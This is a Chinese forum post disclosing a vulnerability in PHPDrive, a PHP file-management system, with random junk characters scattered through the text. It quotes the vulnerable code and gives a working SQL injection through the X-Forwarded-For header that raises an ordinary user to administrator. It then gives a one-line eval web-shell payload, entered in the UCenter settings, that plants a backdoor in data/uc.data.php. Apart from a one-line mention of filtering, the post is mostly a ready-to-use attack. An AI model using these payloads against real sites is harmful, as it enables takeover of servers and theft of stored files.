PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
( w; x' G: N" k8 \( a8 q
9 ^1 B N/ z8 f, {9 ^% Aincludes/user.lib.php
& T- v H( c+ B, f, S! x* I9 H行875 } S% b$ x4 o2 c' ?( f
function get_ip() {* }% V$ n, A0 d0 W5 m
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
0 _& ~6 j2 H, e在用户注册与登录 处module/disk/account.lead.php
( x/ t% s" o0 g7 M198行 % |4 t) U+ e* E5 J" a
//更新本次登录IP和时间
0 ^ w0 N6 N: C2 v) K $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生3 V% j$ v; x2 D3 M+ Z7 X, g
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限, V! W' N! L1 h- z0 M# a7 V: V
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.4 ?6 d' b: w$ F/ H# b2 z
后台getshell:2 ~- ~: V) W; {" h
在UCenter设置处,将UC数据库登录名填写为9 S2 ~0 U: W) ]; `0 G3 d5 _% G8 ]: t9 s
& C% X2 [) G9 s8 d5 G z9 Mroot’);eval($_POST[DisKill]);?>/*2 U2 ~ p& u9 j# t6 w0 P+ r
可以得到一个shell,位置在 data/uc.data.php+ {$ E; t+ S, b& x1 B
% K# O/ I! Y, E( c1 f! }7 _6 | g8 o- }
修复:过滤注入! v: Z/ Q! h: [/ b$ q* C
+ q% G. A7 P9 x( }* e |
发表于 2012-12-31 09:18:34
收藏
支持
反对